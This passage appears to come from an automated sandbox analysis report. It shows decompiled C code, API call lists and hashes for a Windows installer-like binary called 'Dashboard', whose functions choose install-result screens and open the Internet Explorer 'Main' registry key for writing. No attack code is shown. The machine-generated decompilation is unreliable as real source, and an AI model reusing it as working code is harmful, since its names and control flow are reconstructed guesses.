                                                                                                                    0x010120a2
                                                                                                                    0x00000000
                                                                                                                    0x010120a8
                                                                                                                    0x010120a8
                                                                                                                    0x010120ad
                                                                                                                    0x00000000
                                                                                                                    0x010120ad
                                                                                                                    0x01012063
                                                                                                                    0x01012063
                                                                                                                    0x01012065
                                                                                                                    0x0101206a
                                                                                                                    0x010122d1
                                                                                                                    0x010122d4
                                                                                                                    0x010122db
                                                                                                                    0x00000000
                                                                                                                    0x010122db
                                                                                                                    0x01012061

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 01011FC1
                                                                                                                      • Part of subcall function 0100C81B: ?GetValue@Element@DirectUI@@QBEPAVValue@2@PBUPropertyInfo@2@H@Z.UXCORE(703B436C,00000002,?,0100CE37), ref: 0100C825
                                                                                                                    • ?StrToID@DirectUI@@YGGPB_W@Z.UXCORE(FLWCloseBtn,?,?,00000000), ref: 0101201C
                                                                                                                    • ?StrToID@DirectUI@@YGGPB_W@Z.UXCORE(idClose,?,?,00000000), ref: 0101203A
                                                                                                                    • ?StrToID@DirectUI@@YGGPB_W@Z.UXCORE(FLWMinBtn,?,?,00000000), ref: 01012058
                                                                                                                    • ?StrToID@DirectUI@@YGGPB_W@Z.UXCORE(idCompletionClose,?,?,00000000), ref: 01012083
                                                                                                                    • ?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ.UXCORE(00000BD1,00000000,00000000,?,?,?,?,?,?,00000000), ref: 010122D4
                                                                                                                    • PostMessageW.USER32(00000000), ref: 010122DB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Direct$D__@@Element@H_prolog3Host@Info@2@MessageNativePostPropertyValue@Value@2@
                                                                                                                    • String ID: FLWCloseBtn$FLWMinBtn$ProductNameTextInstalled$idCancel$idClose$idCompletionClose$idConfirmedCancel$idFIUListScrollviwer$idIgnore$idInstall$idProductName$idRestartClose$idResume$idRetry
                                                                                                                    • API String ID: 406392691-3517868946
                                                                                                                    • Opcode ID: 7aedde5c5fcc4f158d7e6129bc11e76acc27ab90c889b047db29f61baf3246d3
                                                                                                                    • Instruction ID: 28a74e90999ffff3238f687737c5f8873f1b61b18ecda8d1f5d9e34d59475477
                                                                                                                    • Opcode Fuzzy Hash: 7aedde5c5fcc4f158d7e6129bc11e76acc27ab90c889b047db29f61baf3246d3
                                                                                                                    • Instruction Fuzzy Hash: 52B1A634740241ABFB67EB18C945FB93BA1BB14710FA48498F6C19F1EACB79D942CB14
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 73%
                                                                                                                    			E0100D5AB(void* __ebx, void* __ecx, void* __edx, char _a4) {
                                                                                                                    				signed int _v8;
                                                                                                                    				char _v528;
                                                                                                                    				char _v1048;
                                                                                                                    				char _v2088;
                                                                                                                    				char* _v2092;
                                                                                                                    				void* __edi;
                                                                                                                    				void* __esi;
                                                                                                                    				signed int _t83;
                                                                                                                    				intOrPtr _t85;
                                                                                                                    				char* _t88;
                                                                                                                    				intOrPtr* _t89;
                                                                                                                    				void* _t90;
                                                                                                                    				char* _t99;
                                                                                                                    				void* _t103;
                                                                                                                    				void* _t105;
                                                                                                                    				intOrPtr _t106;
                                                                                                                    				void* _t107;
                                                                                                                    				intOrPtr* _t108;
                                                                                                                    				intOrPtr* _t110;
                                                                                                                    				void* _t111;
                                                                                                                    				intOrPtr* _t112;
                                                                                                                    				void* _t115;
                                                                                                                    				intOrPtr* _t116;
                                                                                                                    				intOrPtr* _t118;
                                                                                                                    				char* _t120;
                                                                                                                    				void* _t121;
                                                                                                                    				intOrPtr* _t122;
                                                                                                                    				void* _t125;
                                                                                                                    				intOrPtr* _t127;
                                                                                                                    				void* _t128;
                                                                                                                    				intOrPtr* _t129;
                                                                                                                    				intOrPtr* _t131;
                                                                                                                    				void* _t134;
                                                                                                                    				intOrPtr* _t135;
                                                                                                                    				void* _t136;
                                                                                                                    				intOrPtr* _t137;
                                                                                                                    				intOrPtr _t138;
                                                                                                                    				intOrPtr _t139;
                                                                                                                    				intOrPtr* _t141;
                                                                                                                    				void* _t142;
                                                                                                                    				intOrPtr* _t145;
                                                                                                                    				void* _t146;
                                                                                                                    				intOrPtr* _t147;
                                                                                                                    				char* _t148;
                                                                                                                    				intOrPtr _t160;
                                                                                                                    				intOrPtr _t162;
                                                                                                                    				intOrPtr _t171;
                                                                                                                    				void* _t182;
                                                                                                                    				char* _t185;
                                                                                                                    				char* _t186;
                                                                                                                    				void* _t187;
                                                                                                                    				signed int _t188;
                                                                                                                    
                                                                                                                    				_t182 = __edx;
                                                                                                                    				_t146 = __ebx;
                                                                                                                    				_t83 =  *0x101a2b4; // 0xcf26dccf
                                                                                                                    				_v8 = _t83 ^ _t188;
                                                                                                                    				_t187 = __ecx;
                                                                                                                    				_t85 =  *0x101a004; // 0x101a004
                                                                                                                    				if(_t85 != 0x101a004 && ( *(_t85 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    					_t5 = _t85 + 0x14; // 0x65637845
                                                                                                                    					_t6 = _t85 + 0x10; // 0x6c744143
                                                                                                                    					_t85 = E010049DE(_t85,  *_t6,  *_t5, 0x2b, 0x1002308);
                                                                                                                    				}
                                                                                                                    				__imp__?GetElement@NativeHWNDHost@DirectUI@@QAEPAVElement@2@XZ();
                                                                                                                    				if(_t85 == 0) {
                                                                                                                    					L6:
                                                                                                                    					_t183 = 0x8000ffff;
                                                                                                                    					L70:
                                                                                                                    					return E010087FB(_t183, _t146, _v8 ^ _t188, _t182, _t183, _t187);
                                                                                                                    				}
                                                                                                                    				__imp__?StrToID@DirectUI@@YGGPB_W@Z(_t85);
                                                                                                                    				_t88 = E0100C3D9(_t85, _t85, L"idInstallErrorHelpLink");
                                                                                                                    				_v2092 = _t88;
                                                                                                                    				if(_t88 == 0) {
                                                                                                                    					goto L6;
                                                                                                                    				}
                                                                                                                    				_t89 =  *((intOrPtr*)(_t187 + 0x5c));
                                                                                                                    				if(_t89 != 0) {
                                                                                                                    					_t90 =  *((intOrPtr*)( *_t89 + 0x50))(_t89, _t146);
                                                                                                                    					if(_t90 != 0 || _a4 != _t90) {
                                                                                                                    						_t91 = 0x32c;
                                                                                                                    						if(_a4 != 0) {
                                                                                                                    							_t91 = 0x32b;
                                                                                                                    						}
                                                                                                                    						_t147 = __imp__?RMLoadString@@YGIIPA_WIKPB_W@Z;
                                                                                                                    						_push(0);
                                                                                                                    						_push(0xf);
                                                                                                                    						_push(0x104);
                                                                                                                    						_push( &_v528);
                                                                                                                    						if( *_t147() == 0) {
                                                                                                                    							L14:
                                                                                                                    							_t183 = 0x8000ffff;
                                                                                                                    							goto L69;
                                                                                                                    						}
                                                                                                                    						E0100C887( &_v528, _v2092,  &_v528);
                                                                                                                    						E0100C964( &_v528, _v2092,  &_v528);
                                                                                                                    						_push(0);
                                                                                                                    						_push(0xf);
                                                                                                                    						_push(0x104);
                                                                                                                    						_push( &_v1048);
                                                                                                                    						_push(0xca);
                                                                                                                    						if( *_t147() == 0) {
                                                                                                                    							goto L14;
                                                                                                                    						}
                                                                                                                    						_t99 =  &_v2088;
                                                                                                                    						__imp__?RMLoadCompoundString@@YGIIPA_WIKPB_W@Z(0xcd, _t99, 0x208, 0xf, 0);
                                                                                                                    						if(_t99 != 0) {
                                                                                                                    							_t103 = E0100D225( &_v528, 0x104,  &_v2088,  &_v1048);
                                                                                                                    							_t183 = _t103;
                                                                                                                    							if(_t103 < 0) {
                                                                                                                    								goto L69;
                                                                                                                    							}
                                                                                                                    							_t105 = E0100CA2F( &_v528, _v2092,  &_v528);
                                                                                                                    							_t183 = _t105;
                                                                                                                    							if(_t105 < 0) {
                                                                                                                    								goto L69;
                                                                                                                    							} else {
                                                                                                                    								_t106 =  *0x101a004; // 0x101a004
                                                                                                                    								if(_t106 != 0x101a004 && ( *(_t106 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    									_t29 = _t106 + 0x14; // 0x65637845
                                                                                                                    									_t30 = _t106 + 0x10; // 0x6c744143
                                                                                                                    									_t106 = E01006C01( *_t30,  *_t29, 0x2c, 0x1002308,  &_v528);
                                                                                                                    								}
                                                                                                                    								_t107 = E0100CF42(_t106, _t187, L"idErrorMsgCont", L"HasError");
                                                                                                                    								_t183 = _t107;
                                                                                                                    								if(_t107 < 0) {
                                                                                                                    									goto L69;
                                                                                                                    								}
                                                                                                                    								goto L21;
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						goto L14;
                                                                                                                    					} else {
                                                                                                                    						L21:
                                                                                                                    						_t108 =  *((intOrPtr*)(_t187 + 0x5c));
                                                                                                                    						_t160 =  *_t108;
                                                                                                                    						_t148 = 0;
                                                                                                                    						_push(_t108);
                                                                                                                    						if(_a4 == 0) {
                                                                                                                    							if( *((intOrPtr*)(_t160 + 0x40))() == 0) {
                                                                                                                    								_t110 =  *((intOrPtr*)(_t187 + 0x5c));
                                                                                                                    								_t111 =  *((intOrPtr*)( *_t110 + 0x38))(_t110);
                                                                                                                    								_t112 =  *((intOrPtr*)(_t187 + 0x5c));
                                                                                                                    								_t162 =  *_t112;
                                                                                                                    								_push(_t112);
                                                                                                                    								if(_t111 == 0) {
                                                                                                                    									if( *((intOrPtr*)(_t162 + 0x3c))() == 0) {
                                                                                                                    										L49:
                                                                                                                    										_t115 = E0100CD1A(E0100CE8D(_t113, _t187), _t114,  *0x101a4d8, 1);
                                                                                                                    										_t183 = _t115;
                                                                                                                    										if(_t115 < 0) {
                                                                                                                    											L69:
                                                                                                                    											_pop(_t146);
                                                                                                                    											goto L70;
                                                                                                                    										}
                                                                                                                    										_t116 =  *((intOrPtr*)(_t187 + 0x5c));
                                                                                                                    										_push(_t116);
                                                                                                                    										if( *((intOrPtr*)( *_t116 + 0x48))() != 0) {
                                                                                                                    											L52:
                                                                                                                    											_t118 =  *((intOrPtr*)(_t187 + 0x5c));
                                                                                                                    											_push(_t118);
                                                                                                                    											if( *((intOrPtr*)( *_t118 + 0x54))() == 0) {
                                                                                                                    												_t120 = L"AllFail";
                                                                                                                    												L64:
                                                                                                                    												_t121 = E0100CF42(_t120, _t187, L"idSummaryFooter", _t120);
                                                                                                                    												_t183 = _t121;
                                                                                                                    												if(_t121 >= 0) {
                                                                                                                    													_t122 =  *((intOrPtr*)(_t187 + 0x5c));
                                                                                                                    													_push(_t122);
                                                                                                                    													if( *((intOrPtr*)( *_t122 + 0x58))() != 0 && E0100CC59() != 0) {
                                                                                                                    														_t125 = E0100CF42(_t124, _t187, L"idCompletionClose", L"NeedReboot");
                                                                                                                    														_t183 = _t125;
                                                                                                                    														if(_t125 >= 0) {
                                                                                                                    															_t183 = E0100CF42(_t125, _t187, L"idRestartClose", L"NeedReboot");
                                                                                                                    														}
                                                                                                                    													}
                                                                                                                    												}
                                                                                                                    												goto L69;
                                                                                                                    											}
                                                                                                                    											_t127 =  *((intOrPtr*)(_t187 + 0x5c));
                                                                                                                    											_t128 =  *((intOrPtr*)( *_t127 + 0x4c))(_t127);
                                                                                                                    											_t129 =  *((intOrPtr*)(_t187 + 0x5c));
                                                                                                                    											_t171 =  *_t129;
                                                                                                                    											_push(_t129);
                                                                                                                    											if(_t128 == 0) {
                                                                                                                    												if( *((intOrPtr*)(_t171 + 0x58))() == 0) {
                                                                                                                    													if(_a4 == 0) {
                                                                                                                    														_t131 =  *((intOrPtr*)(_t187 + 0x5c));
                                                                                                                    														_push(_t131);
                                                                                                                    														if( *((intOrPtr*)( *_t131 + 0x50))() != 0) {
                                                                                                                    															goto L60;
                                                                                                                    														}
                                                                                                                    														_t120 = L"MultipleProductSuccess";
                                                                                                                    														goto L64;
                                                                                                                    													}
                                                                                                                    													L60:
                                                                                                                    													_t120 = L"MultipleProductPartialSuccess";
                                                                                                                    													goto L64;
                                                                                                                    												}
                                                                                                                    												_t120 = L"MultipleProductRebootNeeded";
                                                                                                                    												goto L64;
                                                                                                                    											}
                                                                                                                    											if( *((intOrPtr*)(_t171 + 0x58))() == 0) {
                                                                                                                    												_t120 = L"SingleProductSuccess";
                                                                                                                    											} else {
                                                                                                                    												_t120 = L"SingleProductRebootNeeded";
                                                                                                                    											}
                                                                                                                    											goto L64;
                                                                                                                    										}
                                                                                                                    										_t134 = E0100CF42(_t117, _t187,  *0x101a4dc, L"InstallComplete");
                                                                                                                    										_t183 = _t134;
                                                                                                                    										if(_t134 < 0) {
                                                                                                                    											goto L69;
                                                                                                                    										}
                                                                                                                    										goto L52;
                                                                                                                    									}
                                                                                                                    									_t135 =  *((intOrPtr*)(_t187 + 0x5c));
                                                                                                                    									_t136 =  *((intOrPtr*)( *_t135 + 0x48))(_t135);
                                                                                                                    									_t185 = L"SingleFail";
                                                                                                                    									_v2092 = _t185;
                                                                                                                    									if(_t136 == 0) {
                                                                                                                    										_v2092 = L"AllFail";
                                                                                                                    									}
                                                                                                                    									_t137 =  *((intOrPtr*)(_t187 + 0x5c));
                                                                                                                    									_t113 =  *((intOrPtr*)( *_t137 + 0x48))(_t137);
                                                                                                                    									_t148 = _t185;
                                                                                                                    									if(_t113 == 0) {
                                                                                                                    										_t148 = L"MultipleFail";
                                                                                                                    									}
                                                                                                                    									L39:
                                                                                                                    									if(_v2092 == 0) {
                                                                                                                    										L44:
                                                                                                                    										if(_t148 == 0) {
                                                                                                                    											goto L49;
                                                                                                                    										}
                                                                                                                    										_t138 =  *0x101a004; // 0x101a004
                                                                                                                    										if(_t138 != 0x101a004 && ( *(_t138 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    											_t66 = _t138 + 0x14; // 0x65637845
                                                                                                                    											_t67 = _t138 + 0x10; // 0x6c744143
                                                                                                                    											_t138 = E01008E3D( *_t67,  *_t66, 0x2e, 0x1002308,  *0x101a4e0, _t148);
                                                                                                                    										}
                                                                                                                    										_t113 = E0100CF42(_t138, _t187,  *0x101a4e0, _t148);
                                                                                                                    										_t183 = _t113;
                                                                                                                    										if(_t113 < 0) {
                                                                                                                    											goto L69;
                                                                                                                    										} else {
                                                                                                                    											goto L49;
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    									L40:
                                                                                                                    									_t139 =  *0x101a004; // 0x101a004
                                                                                                                    									if(_t139 != 0x101a004 && ( *(_t139 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    										_t60 = _t139 + 0x14; // 0x65637845
                                                                                                                    										_t61 = _t139 + 0x10; // 0x6c744143
                                                                                                                    										_t139 = E01008E3D( *_t61,  *_t60, 0x2d, 0x1002308,  *0x101a4d8, _v2092);
                                                                                                                    									}
                                                                                                                    									_t113 = E0100CF42(_t139, _t187,  *0x101a4d8, _v2092);
                                                                                                                    									_t183 = _t113;
                                                                                                                    									if(_t113 < 0) {
                                                                                                                    										goto L69;
                                                                                                                    									} else {
                                                                                                                    										goto L44;
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    								_v2092 = L"SomeSucceeded";
                                                                                                                    								if( *((intOrPtr*)(_t162 + 0x48))() == 0) {
                                                                                                                    									_t148 = L"MultipleFail";
                                                                                                                    								} else {
                                                                                                                    									_t148 = L"SingleFail";
                                                                                                                    								}
                                                                                                                    								goto L40;
                                                                                                                    							}
                                                                                                                    							_v2092 = L"AllSucceeded";
                                                                                                                    							goto L40;
                                                                                                                    						}
                                                                                                                    						if( *((intOrPtr*)(_t160 + 0x3c))() == 0) {
                                                                                                                    							_v2092 = L"SomeCancelled";
                                                                                                                    							_t148 = L"PartialCancel";
                                                                                                                    							goto L39;
                                                                                                                    						}
                                                                                                                    						_t141 =  *((intOrPtr*)(_t187 + 0x5c));
                                                                                                                    						_t142 =  *((intOrPtr*)( *_t141 + 0x48))(_t141);
                                                                                                                    						_t148 = L"SingleCancelled";
                                                                                                                    						_t186 = L"AllCancelled";
                                                                                                                    						_v2092 = _t148;
                                                                                                                    						if(_t142 == 0) {
                                                                                                                    							_v2092 = _t186;
                                                                                                                    						}
                                                                                                                    						E0100CD1A(E0100CE8D(_t142, _t187), _t143,  *0x101a4dc, 0);
                                                                                                                    						_t145 =  *((intOrPtr*)(_t187 + 0x5c));
                                                                                                                    						_push(_t145);
                                                                                                                    						if( *((intOrPtr*)( *_t145 + 0x48))() == 0) {
                                                                                                                    							_t148 = _t186;
                                                                                                                    						}
                                                                                                                    						goto L39;
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				goto L6;
                                                                                                                    			}























































                                                                                                                    0x0100d5ab
                                                                                                                    0x0100d5ab
                                                                                                                    0x0100d5b6
                                                                                                                    0x0100d5bd
                                                                                                                    0x0100d5c2
                                                                                                                    0x0100d5c4
                                                                                                                    0x0100d5ce
                                                                                                                    0x0100d5dd
                                                                                                                    0x0100d5e0
                                                                                                                    0x0100d5e3
                                                                                                                    0x0100d5e3
                                                                                                                    0x0100d5eb
                                                                                                                    0x0100d5f3
                                                                                                                    0x0100d618
                                                                                                                    0x0100d618
                                                                                                                    0x0100d9eb
                                                                                                                    0x0100d9fa
                                                                                                                    0x0100d9fa
                                                                                                                    0x0100d5fb
                                                                                                                    0x0100d602
                                                                                                                    0x0100d609
                                                                                                                    0x0100d60f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100d611
                                                                                                                    0x0100d616
                                                                                                                    0x0100d626
                                                                                                                    0x0100d62b
                                                                                                                    0x0100d63a
                                                                                                                    0x0100d63f
                                                                                                                    0x0100d641
                                                                                                                    0x0100d641
                                                                                                                    0x0100d642
                                                                                                                    0x0100d648
                                                                                                                    0x0100d64a
                                                                                                                    0x0100d651
                                                                                                                    0x0100d658
                                                                                                                    0x0100d65e
                                                                                                                    0x0100d6ba
                                                                                                                    0x0100d6ba
                                                                                                                    0x00000000
                                                                                                                    0x0100d6ba
                                                                                                                    0x0100d66d
                                                                                                                    0x0100d67f
                                                                                                                    0x0100d684
                                                                                                                    0x0100d686
                                                                                                                    0x0100d688
                                                                                                                    0x0100d68f
                                                                                                                    0x0100d690
                                                                                                                    0x0100d699
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100d6a4
                                                                                                                    0x0100d6b0
                                                                                                                    0x0100d6b8
                                                                                                                    0x0100d6da
                                                                                                                    0x0100d6df
                                                                                                                    0x0100d6e6
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100d6f9
                                                                                                                    0x0100d6fe
                                                                                                                    0x0100d702
                                                                                                                    0x00000000
                                                                                                                    0x0100d708
                                                                                                                    0x0100d708
                                                                                                                    0x0100d712
                                                                                                                    0x0100d728
                                                                                                                    0x0100d72b
                                                                                                                    0x0100d72e
                                                                                                                    0x0100d72e
                                                                                                                    0x0100d73f
                                                                                                                    0x0100d744
                                                                                                                    0x0100d748
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100d748
                                                                                                                    0x0100d702
                                                                                                                    0x00000000
                                                                                                                    0x0100d74e
                                                                                                                    0x0100d74e
                                                                                                                    0x0100d74e
                                                                                                                    0x0100d751
                                                                                                                    0x0100d753
                                                                                                                    0x0100d758
                                                                                                                    0x0100d759
                                                                                                                    0x0100d7cb
                                                                                                                    0x0100d7d9
                                                                                                                    0x0100d7df
                                                                                                                    0x0100d7e4
                                                                                                                    0x0100d7e7
                                                                                                                    0x0100d7e9
                                                                                                                    0x0100d7ea
                                                                                                                    0x0100d810
                                                                                                                    0x0100d8e9
                                                                                                                    0x0100d8f9
                                                                                                                    0x0100d8fe
                                                                                                                    0x0100d902
                                                                                                                    0x0100d9ea
                                                                                                                    0x0100d9ea
                                                                                                                    0x00000000
                                                                                                                    0x0100d9ea
                                                                                                                    0x0100d908
                                                                                                                    0x0100d90d
                                                                                                                    0x0100d913
                                                                                                                    0x0100d931
                                                                                                                    0x0100d931
                                                                                                                    0x0100d936
                                                                                                                    0x0100d93c
                                                                                                                    0x0100d995
                                                                                                                    0x0100d99a
                                                                                                                    0x0100d9a2
                                                                                                                    0x0100d9a7
                                                                                                                    0x0100d9ab
                                                                                                                    0x0100d9ad
                                                                                                                    0x0100d9b2
                                                                                                                    0x0100d9b8
                                                                                                                    0x0100d9d0
                                                                                                                    0x0100d9d5
                                                                                                                    0x0100d9d9
                                                                                                                    0x0100d9e8
                                                                                                                    0x0100d9e8
                                                                                                                    0x0100d9d9
                                                                                                                    0x0100d9b8
                                                                                                                    0x00000000
                                                                                                                    0x0100d9ab
                                                                                                                    0x0100d93e
                                                                                                                    0x0100d944
                                                                                                                    0x0100d949
                                                                                                                    0x0100d94c
                                                                                                                    0x0100d94e
                                                                                                                    0x0100d94f
                                                                                                                    0x0100d96b
                                                                                                                    0x0100d978
                                                                                                                    0x0100d981
                                                                                                                    0x0100d986
                                                                                                                    0x0100d98c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100d98e
                                                                                                                    0x00000000
                                                                                                                    0x0100d98e
                                                                                                                    0x0100d97a
                                                                                                                    0x0100d97a
                                                                                                                    0x00000000
                                                                                                                    0x0100d97a
                                                                                                                    0x0100d96d
                                                                                                                    0x00000000
                                                                                                                    0x0100d96d
                                                                                                                    0x0100d956
                                                                                                                    0x0100d95f
                                                                                                                    0x0100d958
                                                                                                                    0x0100d958
                                                                                                                    0x0100d958
                                                                                                                    0x00000000
                                                                                                                    0x0100d956
                                                                                                                    0x0100d922
                                                                                                                    0x0100d927
                                                                                                                    0x0100d92b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100d92b
                                                                                                                    0x0100d816
                                                                                                                    0x0100d81c
                                                                                                                    0x0100d821
                                                                                                                    0x0100d826
                                                                                                                    0x0100d82c
                                                                                                                    0x0100d82e
                                                                                                                    0x0100d82e
                                                                                                                    0x0100d838
                                                                                                                    0x0100d83e
                                                                                                                    0x0100d843
                                                                                                                    0x0100d845
                                                                                                                    0x0100d847
                                                                                                                    0x0100d847
                                                                                                                    0x0100d84c
                                                                                                                    0x0100d853
                                                                                                                    0x0100d8a2
                                                                                                                    0x0100d8a4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100d8a6
                                                                                                                    0x0100d8b0
                                                                                                                    0x0100d8c6
                                                                                                                    0x0100d8c9
                                                                                                                    0x0100d8cc
                                                                                                                    0x0100d8cc
                                                                                                                    0x0100d8da
                                                                                                                    0x0100d8df
                                                                                                                    0x0100d8e3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100d8e3
                                                                                                                    0x0100d855
                                                                                                                    0x0100d855
                                                                                                                    0x0100d85f
                                                                                                                    0x0100d87a
                                                                                                                    0x0100d87d
                                                                                                                    0x0100d880
                                                                                                                    0x0100d880
                                                                                                                    0x0100d893
                                                                                                                    0x0100d898
                                                                                                                    0x0100d89c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100d89c
                                                                                                                    0x0100d7ec
                                                                                                                    0x0100d7fb
                                                                                                                    0x0100d804
                                                                                                                    0x0100d7fd
                                                                                                                    0x0100d7fd
                                                                                                                    0x0100d7fd
                                                                                                                    0x00000000
                                                                                                                    0x0100d7fb
                                                                                                                    0x0100d7cd
                                                                                                                    0x00000000
                                                                                                                    0x0100d7cd
                                                                                                                    0x0100d760
                                                                                                                    0x0100d7b2
                                                                                                                    0x0100d7bc
                                                                                                                    0x00000000
                                                                                                                    0x0100d7bc
                                                                                                                    0x0100d762
                                                                                                                    0x0100d768
                                                                                                                    0x0100d76d
                                                                                                                    0x0100d772
                                                                                                                    0x0100d777
                                                                                                                    0x0100d77d
                                                                                                                    0x0100d77f
                                                                                                                    0x0100d77f
                                                                                                                    0x0100d795
                                                                                                                    0x0100d79a
                                                                                                                    0x0100d79f
                                                                                                                    0x0100d7a5
                                                                                                                    0x0100d7ab
                                                                                                                    0x0100d7ab
                                                                                                                    0x00000000
                                                                                                                    0x0100d7a5
                                                                                                                    0x0100d62b
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • ?GetElement@NativeHWNDHost@DirectUI@@QAEPAVElement@2@XZ.UXCORE ref: 0100D5EB
                                                                                                                    • ?StrToID@DirectUI@@YGGPB_W@Z.UXCORE(idInstallErrorHelpLink,00000000), ref: 0100D5FB
                                                                                                                    • ?RMLoadString@@YGIIPA_WIKPB_W@Z.UXCORE(0000032C,?,00000104,0000000F,00000000), ref: 0100D65A
                                                                                                                    • ?RMLoadString@@YGIIPA_WIKPB_W@Z.UXCORE(000000CA,?,00000104,0000000F,00000000,?), ref: 0100D695
                                                                                                                    • ?RMLoadCompoundString@@YGIIPA_WIKPB_W@Z.UXCORE(000000CD,?,00000208,0000000F,00000000), ref: 0100D6B0
                                                                                                                      • Part of subcall function 010049DE: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 010049F3
                                                                                                                      • Part of subcall function 0100D225: _vsnwprintf.MSVCR80 ref: 0100D258
                                                                                                                      • Part of subcall function 0100CA2F: ?CreateString@Value@DirectUI@@SGPAV12@PB_WPAUHINSTANCE__@@I@Z.UXCORE(?,00000000,00000000), ref: 0100CA3F
                                                                                                                      • Part of subcall function 01006C01: TraceMessage.ADVAPI32(?,?,0000002B,?,?,NULL,0000000A,00000000), ref: 01006C5D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DirectLoadString@@$MessageTrace$CompoundCreateE__@@Element@Element@2@Host@NativeString@V12@Value@_vsnwprintf
                                                                                                                    • String ID: AllCancelled$AllFail$AllSucceeded$HasError$InstallComplete$MultipleFail$MultipleProductPartialSuccess$MultipleProductRebootNeeded$MultipleProductSuccess$NeedReboot$PartialCancel$SingleCancelled$SingleFail$SingleProductRebootNeeded$SingleProductSuccess$SomeCancelled$SomeSucceeded$idCompletionClose$idErrorMsgCont$idInstallErrorHelpLink$idRestartClose$idSummaryFooter
                                                                                                                    • API String ID: 218840918-2671734306
                                                                                                                    • Opcode ID: 78dd9e5f8ca60656dcae873aecfaa4802ba6b4925d1cd117f78a0f96731dd34f
                                                                                                                    • Instruction ID: 2ad8084ce7e743547ef01bbabb4c4eaaf0d8d145b63ff253c7f9afca7e270cf1
                                                                                                                    • Opcode Fuzzy Hash: 78dd9e5f8ca60656dcae873aecfaa4802ba6b4925d1cd117f78a0f96731dd34f
                                                                                                                    • Instruction Fuzzy Hash: 34C1A1306002019BFB679FD8C858FAA7BA6FF44644F1440D9E9C99B2D1CE36D946CB20
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 98%
                                                                                                                    			E01010E59(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				signed int _t30;
                                                                                                                    				signed int _t75;
                                                                                                                    				signed int _t76;
                                                                                                                    				signed int _t77;
                                                                                                                    				void* _t81;
                                                                                                                    				void* _t82;
                                                                                                                    				signed int _t88;
                                                                                                                    				signed int _t94;
                                                                                                                    				signed int _t99;
                                                                                                                    
                                                                                                                    				_t82 = __eflags;
                                                                                                                    				_push(0xc);
                                                                                                                    				E0100880F(E01016334, __ebx, __edi, __esi);
                                                                                                                    				 *(_t81 - 0x10) = 0;
                                                                                                                    				 *((intOrPtr*)(_t81 - 4)) = 0;
                                                                                                                    				_t30 = E01010B31(__ebx, __edx, 0, __esi, _t82);
                                                                                                                    				 *(_t81 - 0x14) = _t30;
                                                                                                                    				if(_t30 >= 0) {
                                                                                                                    					L26:
                                                                                                                    					E0100C53D(_t81 - 0x10);
                                                                                                                    					return E010088FB( *(_t81 - 0x14));
                                                                                                                    				}
                                                                                                                    				 *(_t81 - 0x14) = 0;
                                                                                                                    				_t75 = E0100C55B(_t81 - 0x10, 0x80000001, L"Software\\Microsoft\\Internet Explorer\\Main", 0, 0, 0x2001f, 0, 0);
                                                                                                                    				if(_t75 != 0) {
                                                                                                                    					L7:
                                                                                                                    					if(_t88 > 0) {
                                                                                                                    						_t75 = _t75 & 0x0000ffff | 0x80070000;
                                                                                                                    					}
                                                                                                                    					 *(_t81 - 0x14) = _t75;
                                                                                                                    					if(_t75 < 0) {
                                                                                                                    						goto L26;
                                                                                                                    					} else {
                                                                                                                    						goto L10;
                                                                                                                    					}
                                                                                                                    				} else {
